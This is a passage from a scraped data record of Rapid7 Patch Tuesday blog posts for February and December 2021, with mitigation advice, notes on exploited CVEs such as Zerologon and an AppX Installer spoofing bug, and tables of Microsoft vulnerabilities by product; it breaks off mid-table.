The RCE exploits are probably not a threat in the short term, due to the complexity of the vulnerabilities, but DoS attacks are expected to be seen much more quickly. Windows systems should be patched as soon as possible to protect against these.\n\nIn the event a patch cannot be applied immediately, such as on systems that cannot be rebooted, Microsoft has published mitigation guidance that will protect against exploitation of the TCP/IP vulnerabilities. Depending on the exposure of an asset, IPv4 Source Routing should be disabled via a Group Policy or a Netsh command, and IPv6 packet reassembly should be disabled via a separate Netsh command. IPv4 Source Routing requests and IPv6 fragments can also be blocked at load balancers, firewalls, or other edge devices to mitigate these issues.\n\n### Zerologon Update\n\nBack in August 2020, Microsoft addressed a critical remote code vulnerability (CVE-2020-1472) affecting the Netlogon protocol (MS-NRPC), a.k.a. \u201c[Zerologon](<https://blog.rapid7.com/2020/09/14/cve-2020-1472-zerologon-critical-privilege-escalation/>)\u201d. In October, Microsoft [noted](<https://msrc-blog.microsoft.com/2020/10/29/attacks-exploiting-netlogon-vulnerability-cve-2020-1472/>) that attacks which exploit this weakness have been seen in the wild. On January 14, 2021, they [reminded](<https://msrc-blog.microsoft.com/2021/01/14/netlogon-domain-controller-enforcement-mode-is-enabled-by-default-beginning-with-the-february-9-2021-security-update-related-to-cve-2020-1472/>) organizations that the February 2021 security update bundle will also be enabling \u201cDomain Controller enforcement mode\u201d by default to fully address this weakness. Any system that tries to make an insecure Netlogon connection will be denied access. Any business-critical process that relies on these insecure connections will cease to function. 
Rapid7 encourages all organizations to [heed the detailed guidance](<https://support.microsoft.com/en-us/topic/how-to-manage-the-changes-in-netlogon-secure-channel-connections-associated-with-cve-2020-1472-f7e8cc17-0309-1d6a-304e-5ba73cd1a11e#bkmk_detectingnon_compliant>) before applying the latest updates to ensure business process continuity.\n\n### Adobe\n\nMost important amongst the [six security advisories](<https://helpx.adobe.com/security.html>) published by Adobe today is [APSB21-09](<https://helpx.adobe.com/security/products/acrobat/apsb21-09.html>), detailing 23 CVEs affecting Adobe Acrobat and Reader. Six of these are rated Critical and allow Arbitrary Code Execution, and one of these (CVE-2021-21017) has been seen exploited in the wild in attacks targeting Adobe Reader users on Windows.\n\n### Summary Tables\n\n#### Azure Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed | CVSSv3 Base Score | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-24109](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24109>) | Microsoft Azure Kubernetes Service Elevation of Privilege Vulnerability | No | No | 6.8 | Yes \n[CVE-2021-24087](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24087>) | Azure IoT CLI extension Elevation of Privilege Vulnerability | No | No | 7 | Yes \n \n#### Browser Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed | CVSSv3 Base Score | FAQ? 
\n---|---|---|---|---|--- \n[CVE-2021-24100](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24100>) | Microsoft Edge for Android Information Disclosure Vulnerability | No | No | 5 | Yes \n[CVE-2021-24113](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24113>) | Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability | No | No | 4.6 | Yes \n[CVE-2021-21148](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21148>) | Chromium CVE-2021-21148: Heap buffer overflow in V8 | N/A | N/A | nan | Yes \n[CVE-2021-21147](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21147>) | Chromium CVE-2021-21147: Inappropriate implementation in Skia | N/A | N/A | nan | Yes \n[CVE-2021-21146](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21146>) | Chromium CVE-2021-21146: Use after free in Navigation | N/A | N/A | nan | Yes \n[CVE-2021-21145](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21145>) | Chromium CVE-2021-21145: Use after free in Fonts | N/A | N/A | nan | Yes \n[CVE-2021-21144](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21144>) | Chromium CVE-2021-21144: Heap buffer overflow in Tab Groups | N/A | N/A | nan | Yes \n[CVE-2021-21143](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21143>) | Chromium CVE-2021-21143: Heap buffer overflow in Extensions | N/A | N/A | nan | Yes \n[CVE-2021-21142](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21142>) | Chromium CVE-2021-21142: Use after free in Payments | N/A | N/A | nan | Yes \n \n#### Developer Tools Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed | CVSSv3 Base Score | FAQ? 
\n---|---|---|---|---|--- \n[CVE-2021-26700](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26700>) | Visual Studio Code npm-script Extension Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-1639](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1639>) | Visual Studio Code Remote Code Execution Vulnerability | No | No | 7 | No \n[CVE-2021-1733](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1733>) | Sysinternals PsExec Elevation of Privilege Vulnerability | No | Yes | 7.8 | Yes \n[CVE-2021-24105](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24105>) | Package Managers Configurations Remote Code Execution Vulnerability | No | No | 8.4 | Yes \n[CVE-2021-24111](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24111>) | .NET Framework Denial of Service Vulnerability | No | No | 7.5 | No \n[CVE-2021-1721](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1721>) | .NET Core and Visual Studio Denial of Service Vulnerability | No | Yes | 6.5 | No \n[CVE-2021-26701](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26701>) | .NET Core Remote Code Execution Vulnerability | No | Yes | 8.1 | Yes \n[CVE-2021-24112](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24112>) | .NET Core Remote Code Execution Vulnerability | No | No | 8.1 | Yes \n \n#### ESU Windows Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed | CVSSv3 Base Score | FAQ? 
\n---|---|---|---|---|--- \n[CVE-2021-24080](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24080>) | Windows Trust Verification API Denial of Service Vulnerability | No | No | 6.5 | No \n[CVE-2021-24074](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24074>) | Windows TCP/IP Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2021-24094](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24094>) | Windows TCP/IP Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2021-24086](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24086>) | Windows TCP/IP Denial of Service Vulnerability | No | No | 7.5 | Yes \n[CVE-2021-1734](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1734>) | Windows Remote Procedure Call Information Disclosure Vulnerability | No | No | 7.5 | Yes \n[CVE-2021-25195](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-25195>) | Windows PKU2U Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-24088](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24088>) | Windows Local Spooler Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-1727](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1727>) | Windows Installer Elevation of Privilege Vulnerability | No | Yes | 7.8 | No \n[CVE-2021-24077](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24077>) | Windows Fax Service Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2021-1722](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1722>) | Windows Fax Service Remote Code Execution Vulnerability | No | No | 8.1 | Yes \n[CVE-2021-24102](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24102>) | Windows Event Tracing Elevation of 
Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-24103](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24103>) | Windows Event Tracing Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-24078](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24078>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2021-24083](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24083>) | Windows Address Book Remote Code Execution Vulnerability | No | No | 7.8 | No \n \n#### Exchange Server Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed | CVSSv3 Base Score | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-24085](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24085>) | Microsoft Exchange Server Spoofing Vulnerability | No | No | 6.5 | Yes \n[CVE-2021-1730](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1730>) | Microsoft Exchange Server Spoofing Vulnerability | No | No | 5.4 | Yes \n \n#### Microsoft Dynamics Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed | CVSSv3 Base Score | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-1724](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1724>) | Microsoft Dynamics Business Central Cross-site Scripting Vulnerability | No | No | 6.1 | No \n[CVE-2021-24101](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24101>) | Microsoft Dataverse Information Disclosure Vulnerability | No | No | 6.5 | Yes \n \n#### Microsoft Office Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed | CVSSv3 Base Score | FAQ? 
\n---|---|---|---|---|--- \n[CVE-2021-24073](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24073>) | Skype for Business and Lync Spoofing Vulnerability | No | No | 6.5 | No \n[CVE-2021-24099](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24099>) | Skype for Business and Lync Denial of Service Vulnerability | No | No | 6.5 | No \n[CVE-2021-24114](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24114>) | Microsoft Teams iOS Information Disclosure Vulnerability | No | No | 5.7 | Yes \n[CVE-2021-1726](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1726>) | Microsoft SharePoint Spoofing Vulnerability | No | No | 8 | Yes \n[CVE-2021-24072](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24072>) | Microsoft SharePoint Server Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2021-24066](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24066>) | Microsoft SharePoint Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2021-24071](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24071>) | Microsoft SharePoint Information Disclosure Vulnerability | No | No | 5.3 | Yes \n[CVE-2021-24067](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24067>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-24068](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24068>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-24069](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24069>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-24070](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24070>) | Microsoft Excel Remote Code Execution 
Vulnerability | No | No | 7.8 | Yes \n \n#### System Center Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed | CVSSv3 Base Score | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-1728](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1728>) | System Center Operations Manager Elevation of Privilege Vulnerability | No | No | 8.8 | Yes \n[CVE-2021-24092](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24092>) | Microsoft Defender Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n \n#### Windows Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed | CVSSv3 Base Score | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-1732](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1732>) | Windows Win32k Elevation of Privilege Vulnerability | Yes | No | 7.8 | No \n[CVE-2021-1698](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1698>) | Windows Win32k Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-24075](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24075>) | Windows Network File System Denial of Service Vulnerability | No | No | 6.8 | No \n[CVE-2021-24084](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24084>) | Windows Mobile Device Management Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-24096](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24096>) | Windows Kernel Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-24093](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24093>) | Windows Graphics Component Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2021-24106](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24106>) | Windows DirectX Information Disclosure Vulnerability | No | Yes | 
5.5 | Yes \n[CVE-2021-24098](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24098>) | Windows Console Driver Denial of Service Vulnerability | No | Yes | 5.5 | Yes \n[CVE-2021-24091](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24091>) | Windows Camera Codec Pack Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-24079](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24079>) | Windows Backup Engine Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-1731](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1731>) | PFX Encryption Security Feature Bypass Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-24082](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24082>) | Microsoft.PowerShell.Utility Module WDAC Security Feature Bypass Vulnerability | No | No | 4.3 | No \n[CVE-2021-24076](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24076>) | Microsoft Windows VMSwitch Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-24081](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24081>) | Microsoft Windows Codecs Library Remote Code Execution Vulnerability | No | No | 7.8 | No \n \n### Summary Charts\n\n_Note: Chart data is reflective of data presented by Microsoft's CVRF at the time of writing._", "cvss3": {}, "published": "2021-02-09T23:51:27", "type": "rapid7blog", "title": "Patch Tuesday - February 2021", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-1472", "CVE-2021-1639", "CVE-2021-1698", "CVE-2021-1721", "CVE-2021-1722", "CVE-2021-1724", "CVE-2021-1726", "CVE-2021-1727", "CVE-2021-1728", "CVE-2021-1730", "CVE-2021-1731", "CVE-2021-1732", "CVE-2021-1733", "CVE-2021-1734", "CVE-2021-21017", "CVE-2021-21142", "CVE-2021-21143", "CVE-2021-21144", "CVE-2021-21145", 
"CVE-2021-21146", "CVE-2021-21147", "CVE-2021-21148", "CVE-2021-24066", "CVE-2021-24067", "CVE-2021-24068", "CVE-2021-24069", "CVE-2021-24070", "CVE-2021-24071", "CVE-2021-24072", "CVE-2021-24073", "CVE-2021-24074", "CVE-2021-24075", "CVE-2021-24076", "CVE-2021-24077", "CVE-2021-24078", "CVE-2021-24079", "CVE-2021-24080", "CVE-2021-24081", "CVE-2021-24082", "CVE-2021-24083", "CVE-2021-24084", "CVE-2021-24085", "CVE-2021-24086", "CVE-2021-24087", "CVE-2021-24088", "CVE-2021-24091", "CVE-2021-24092", "CVE-2021-24093", "CVE-2021-24094", "CVE-2021-24096", "CVE-2021-24098", "CVE-2021-24099", "CVE-2021-24100", "CVE-2021-24101", "CVE-2021-24102", "CVE-2021-24103", "CVE-2021-24105", "CVE-2021-24106", "CVE-2021-24109", "CVE-2021-24111", "CVE-2021-24112", "CVE-2021-24113", "CVE-2021-24114", "CVE-2021-25195", "CVE-2021-26700", "CVE-2021-26701"], "modified": "2021-02-09T23:51:27", "id": "RAPID7BLOG:44EA89871AFF6881B909B9FD0E07034F", "href": "https://blog.rapid7.com/2021/02/09/patch-tuesday-february-2021/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-22T09:04:02", "description": "\n\nThis month\u2019s Patch Tuesday comes in the middle of a global effort to mitigate [Apache Log4j CVE-2021-44228](<https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/>). In today\u2019s security release, Microsoft issued fixes for 83 vulnerabilities across an array of products \u2014 including a fix for Windows Defender for IoT, which is [vulnerable to CVE-2021-44228](<https://techcommunity.microsoft.com/t5/microsoft-defender-for-iot/updated-13-dec-microsoft-defender-for-iot-security-advisory/m-p/3036844>) amongst seven other remote code execution (RCE) vulnerabilities (the cloud service is not affected). 
Six CVEs in the bulletin have been publicly disclosed; the only vulnerability noted as being exploited in the wild in this month\u2019s release is [CVE-2021-43890](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43890>), a Windows AppX Installer spoofing bug that may aid in social engineering attacks and has evidently been used in Emotet malware campaigns.\n\nInterestingly, this round of fixes also includes [CVE-2021-43883](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43883>), a Windows Installer privilege escalation bug whose advisory is sparse despite the fact that it appears to affect all supported versions of Windows. While there\u2019s no indication in the advisory that the two vulnerabilities are related, CVE-2021-43883 looks an awful lot like the fix for [a zero-day vulnerability](<https://www.rapid7.com/blog/post/2021/11/30/ongoing-exploitation-of-windows-installer-cve-2021-41379/>) that made a splash in the security community last month after proof-of-concept exploit code was released and in-the-wild attacks began. The zero-day vulnerability, which researchers hypothesized was a patch bypass for CVE-2021-41379, allowed low-privileged attackers to overwrite protected files and escalate to SYSTEM. Rapid7\u2019s vulnerability research team did a full [root cause analysis](<https://attackerkb.com/topics/7LstI2clmF/cve-2021-41379/rapid7-analysis?referrer=ptblog>) of the bug as attacks ramped up in November.\n\nAs usual, RCE flaws figure prominently in the \u201cCritical\u201d-rated CVEs this month. In addition to Windows Defender for IoT, critical RCE bugs were fixed this month in Microsoft Office, Microsoft Devices, Internet Storage Name Service (iSNS), and the WSL extension for Visual Studio Code. Given the outsized risk presented by most vulnerable implementations of Log4Shell, administrators should prioritize patches for any products affected by CVE-2021-44228. 
Past that, put critical server-side and OS RCE patches at the top of your list, and we\u2019d advise sneaking in the fix for CVE-2021-43883 despite its lower severity rating. \n\n## Summary charts\n\n\n\n## Summary tables\n\n### Apps Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed? | CVSSv3 | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2021-43890](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43890>) | Windows AppX Installer Spoofing Vulnerability | Yes | Yes | 7.1 | Yes \n[CVE-2021-43905](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43905>) | Microsoft Office app Remote Code Execution Vulnerability | No | No | 9.6 | Yes \n \n### Browser Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed? | CVSSv3 | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2021-4068](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4068>) | Chromium: CVE-2021-4068 Insufficient validation of untrusted input in new tab page | No | No | N/A | Yes \n[CVE-2021-4067](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4067>) | Chromium: CVE-2021-4067 Use after free in window manager | No | No | N/A | Yes \n[CVE-2021-4066](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4066>) | Chromium: CVE-2021-4066 Integer underflow in ANGLE | No | No | N/A | Yes \n[CVE-2021-4065](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4065>) | Chromium: CVE-2021-4065 Use after free in autofill | No | No | N/A | Yes \n[CVE-2021-4064](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4064>) | Chromium: CVE-2021-4064 Use after free in screen capture | No | No | N/A | Yes \n[CVE-2021-4063](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4063>) | Chromium: CVE-2021-4063 Use after free in developer tools | No | No | N/A | Yes 
\n[CVE-2021-4062](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4062>) | Chromium: CVE-2021-4062 Heap buffer overflow in BFCache | No | No | N/A | Yes \n[CVE-2021-4061](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4061>) | Chromium: CVE-2021-4061 Type Confusion in V8 | No | No | N/A | Yes \n[CVE-2021-4059](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4059>) | Chromium: CVE-2021-4059 Insufficient data validation in loader | No | No | N/A | Yes \n[CVE-2021-4058](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4058>) | Chromium: CVE-2021-4058 Heap buffer overflow in ANGLE | No | No | N/A | Yes \n[CVE-2021-4057](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4057>) | Chromium: CVE-2021-4057 Use after free in file API | No | No | N/A | Yes \n[CVE-2021-4056](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4056>) | Chromium: CVE-2021-4056: Type Confusion in loader | No | No | N/A | Yes \n[CVE-2021-4055](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4055>) | Chromium: CVE-2021-4055 Heap buffer overflow in extensions | No | No | N/A | Yes \n[CVE-2021-4054](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4054>) | Chromium: CVE-2021-4054 Incorrect security UI in autofill | No | No | N/A | Yes \n[CVE-2021-4053](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4053>) | Chromium: CVE-2021-4053 Use after free in UI | No | No | N/A | Yes \n[CVE-2021-4052](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4052>) | Chromium: CVE-2021-4052 Use after free in web apps | No | No | N/A | Yes \n \n### Developer Tools Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed? | CVSSv3 | Has FAQ? 
\n---|---|---|---|---|--- \n[CVE-2021-43907](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43907>) | Visual Studio Code WSL Extension Remote Code Execution Vulnerability | No | No | 9.8 | No \n[CVE-2021-43908](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43908>) | Visual Studio Code Spoofing Vulnerability | No | No | nan | No \n[CVE-2021-43891](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43891>) | Visual Studio Code Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-43896](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43896>) | Microsoft PowerShell Spoofing Vulnerability | No | No | 5.5 | No \n[CVE-2021-43892](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43892>) | Microsoft BizTalk ESB Toolkit Spoofing Vulnerability | No | No | 7.4 | No \n[CVE-2021-43225](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43225>) | Bot Framework SDK Remote Code Execution Vulnerability | No | No | 7.5 | No \n[CVE-2021-43877](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43877>) | ASP.NET Core and Visual Studio Elevation of Privilege Vulnerability | No | No | 7.8 | No \n \n### Device Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed? | CVSSv3 | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2021-43899](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43899>) | Microsoft 4K Wireless Display Adapter Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n \n### Microsoft Office Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed? | CVSSv3 | Has FAQ? 
\n---|---|---|---|---|--- \n[CVE-2021-42295](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-42295>) | Visual Basic for Applications Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-42320](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-42320>) | Microsoft SharePoint Server Spoofing Vulnerability | No | No | 8 | Yes \n[CVE-2021-43242](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43242>) | Microsoft SharePoint Server Spoofing Vulnerability | No | No | 7.6 | No \n[CVE-2021-42309](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-42309>) | Microsoft SharePoint Server Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2021-42294](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-42294>) | Microsoft SharePoint Server Remote Code Execution Vulnerability | No | No | 7.2 | Yes \n[CVE-2021-43255](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43255>) | Microsoft Office Trust Center Spoofing Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-43875](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43875>) | Microsoft Office Graphics Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-42293](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-42293>) | Microsoft Jet Red Database Engine and Access Connectivity Engine Elevation of Privilege Vulnerability | No | No | 6.5 | Yes \n[CVE-2021-43256](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43256>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n \n### System Center Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed? | CVSSv3 | Has FAQ? 
\n---|---|---|---|---|--- \n[CVE-2021-43882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43882>) | Microsoft Defender for IoT Remote Code Execution Vulnerability | No | No | 9 | Yes \n[CVE-2021-42311](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-42311>) | Microsoft Defender for IoT Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2021-42313](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-42313>) | Microsoft Defender for IoT Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2021-42314](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-42314>) | Microsoft Defender for IoT Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2021-42315](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-42315>) | Microsoft Defender for IoT Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2021-41365](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41365>) | Microsoft Defender for IoT Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2021-42310](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-42310>) | Microsoft Defender for IoT Remote Code Execution Vulnerability | No | No | 8.1 | Yes \n[CVE-2021-43889](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43889>) | Microsoft Defender for IoT Remote Code Execution Vulnerability | No | No | 7.2 | Yes \n[CVE-2021-43888](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43888>) | Microsoft Defender for IoT Information Disclosure Vulnerability | No | No | 7.5 | Yes \n[CVE-2021-42312](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-42312>) | Microsoft Defender for IOT Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n \n### Windows Vulnerabilities\n\nCVE | Vulnerability Title | 
